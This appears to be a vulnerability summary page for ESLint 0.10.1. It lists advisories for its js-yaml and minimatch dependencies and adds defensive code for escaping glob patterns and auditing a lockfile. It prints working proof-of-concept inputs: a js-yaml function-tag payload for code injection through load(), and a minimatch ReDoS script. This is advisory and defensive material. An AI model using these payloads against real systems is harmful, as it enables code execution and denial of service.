ESLint version 0.10.1 represents a minor update to the popular JavaScript linting tool, building upon the foundation established by version 0.10.0. Both versions share identical core dependencies and development dependencies (including crucial tools like Esprima for parsing, Mocha for testing, and js-yaml for configuration), so the key difference lies in the release date. Version 0.10.1 was released on December 6, 2014, a little over a week after the previous version, which was released on November 27, 2014. This suggests that version 0.10.1 likely incorporates bug fixes, minor enhancements, or refinements identified since the 0.10.0 release.
For developers using ESLint, this means upgrading to 0.10.1 is advisable to ensure you're benefiting from the most up-to-date and stable experience. Although the core functionality remains the same, bug fixes can be crucial for preventing unexpected behavior or misinterpretations of code, leading to more accurate and reliable linting results. These updates ensure smoother integration with complex JavaScript projects, reduce false positives, and improve the overall developer workflow. The presence of development dependencies like eslint-tester, mocha-phantomjs, and browserify highlights the project's commitment to rigorous testing and cross-platform compatibility, further reassuring developers of its robust nature.
All the vulnerabilities related to version 0.10.1 of the package
Denial of Service in js-yaml
Versions of js-yaml prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources, leading to a Denial of Service.
Upgrade to version 3.13.0.
Code Injection in js-yaml
Versions of js-yaml prior to 3.13.1 are vulnerable to Code Injection. The load() function may execute arbitrary code injected through a malicious YAML file. Objects that have toString as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the load() function. The safeLoad() function is unaffected.
An example payload is
{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1
which returns the object
{
"1553107949161": 1
}
Upgrade to version 3.13.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
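The advisory's root cause is user-controlled input reaching the pattern argument. The following is an added example (not code from the advisory or from minimatch itself) showing two defensive layers for code that still has to build patterns from outside input after upgrading: escaping the input so it can only ever match itself literally, and a heuristic size-and-shape check for application-defined patterns. The names escapeGlob, checkPattern, matchLiteral, matchChecked and the MAX_PATTERN_LENGTH limit are assumptions of this example; the matcher is injected so the file runs without the library installed.

```javascript
// Added example, not code from the advisory or from minimatch itself.
// Two defensive layers for code that builds a minimatch pattern from user input:
//   1. escapeGlob(): turn the input into a literal so it cannot become a pattern;
//   2. checkPattern(): bound the size and shape of a pattern before it is matched.
// The matcher is injected so this file runs without the library installed.

const GLOB_META = /[\\*?[\]{}()!+@^$|]/g; // characters minimatch gives special meaning
const MAX_PATTERN_LENGTH = 256;            // assumed application limit, not a library constant

// Backslash-escape every glob metacharacter so the string matches only itself.
function escapeGlob(input) {
  return String(input).replace(GLOB_META, (c) => '\\' + c);
}

// Heuristic check on a pattern: reject oversized patterns and an unclosed
// '[' character class (the shape of the proof-of-concept above). The scan is
// escape-aware: a backslash makes the following character literal.
function checkPattern(pattern, maxLen = MAX_PATTERN_LENGTH) {
  if (typeof pattern !== 'string') return { ok: false, reason: 'not a string' };
  if (pattern.length > maxLen) return { ok: false, reason: `longer than ${maxLen} characters` };
  let inClass = false;
  for (let i = 0; i < pattern.length; i++) {
    const c = pattern[i];
    if (c === '\\') { i++; continue; }           // skip the escaped character
    if (c === '[' && !inClass) inClass = true;
    else if (c === ']' && inClass) inClass = false;
  }
  if (inClass) return { ok: false, reason: 'unclosed character class' };
  return { ok: true, reason: '' };
}

// Match a path against user input treated as a literal file name, never as a pattern.
// `matcher` has the minimatch(path, pattern) signature; pass the real one in production.
function matchLiteral(path, userInput, matcher) {
  return matcher(path, escapeGlob(userInput));
}

// Match against an application-defined pattern only after validating it.
function matchChecked(path, pattern, matcher) {
  const verdict = checkPattern(pattern);
  if (!verdict.ok) throw new Error(`rejected pattern: ${verdict.reason}`);
  return matcher(path, pattern);
}

// Stand-alone demo with a stub matcher that only echoes the pattern it received.
if (typeof require !== 'undefined' && require.main === module) {
  const echo = (path, pattern) => pattern;
  console.log(matchLiteral('foo', '[!A', echo));              // \[\!A
  console.log(checkPattern('[!' + '\\'.repeat(300) + 'A'));   // { ok: false, reason: 'longer than 256 characters' }
}
```

Escaping is the right default whenever the input is meant to name a file rather than describe a set of files; the checkPattern heuristic is a belt-and-braces limit for patterns the application itself constructs, not a substitute for updating the package.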
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
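The practical question for anyone pinned to ESLint 0.10.1 is whether the js-yaml and minimatch copies actually installed (including transitive ones) sit below the fixed versions named above: js-yaml 3.13.0 and 3.13.1, minimatch 3.0.2. The following added example (not code from the advisories, from ESLint or from npm) walks a package-lock-style dependency tree and reports every installed version below a fixed version. The advisory table holds only the fixed versions stated on this page; the SAMPLE_LOCK tree and its version numbers are constructed for the demo and are not ESLint's real lockfile, and the names auditLock, walkLock and compareVersions are this example's own.

```javascript
// Added example (not from the advisories, from ESLint or from npm): check the
// dependency versions recorded in a package-lock-style tree against the fixed
// versions named in the advisories on this page.

// Advisory table built only from the fixed versions stated on this page.
const ADVISORIES = [
  { pkg: 'js-yaml', fixed: '3.13.0', title: 'Denial of Service in js-yaml' },
  { pkg: 'js-yaml', fixed: '3.13.1', title: 'Code Injection in js-yaml' },
  { pkg: 'minimatch', fixed: '3.0.2', title: 'Regular Expression Denial of Service in minimatch' },
];

// Parse an exact "MAJOR.MINOR.PATCH" version (a leading "v" or "=" is ignored).
function parseVersion(v) {
  const m = /^[v=]?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`not an exact semver version: ${v}`);
  return m.slice(1, 4).map(Number);
}

// Return -1, 0 or 1 when comparing two exact versions numerically, field by field.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Walk a nested lock tree { dependencies: { name: { version, dependencies } } }
// and yield every installed package with the path it was reached through,
// so transitive copies of a package are reported as well as direct ones.
function* walkLock(node, path = []) {
  const deps = node.dependencies || {};
  for (const [name, info] of Object.entries(deps)) {
    const here = [...path, name];
    yield { name, version: info.version, path: here.join(' > ') };
    yield* walkLock(info, here);
  }
}

// Report every installed package version that is below an advisory's fixed version.
function auditLock(lock, advisories = ADVISORIES) {
  const findings = [];
  for (const dep of walkLock(lock)) {
    for (const adv of advisories) {
      if (adv.pkg === dep.name && compareVersions(dep.version, adv.fixed) < 0) {
        findings.push({ ...dep, advisory: adv.title, fixed: adv.fixed });
      }
    }
  }
  return findings;
}

// Constructed sample lock tree; the version numbers are illustrative, not ESLint's.
const SAMPLE_LOCK = {
  dependencies: {
    'js-yaml': { version: '3.2.3' },
    minimatch: { version: '3.0.2' },
    glob: { version: '5.0.15', dependencies: { minimatch: { version: '2.0.10' } } },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditLock(SAMPLE_LOCK)) {
    console.log(`${f.path}@${f.version}: ${f.advisory} (fixed in ${f.fixed})`);
  }
}
```

In the sample tree the top-level minimatch 3.0.2 is clean, but the copy nested under glob is still below 3.0.2, which is exactly the case a glance at the top-level dependency list misses; the js-yaml entry is flagged twice because it is below both fixed versions.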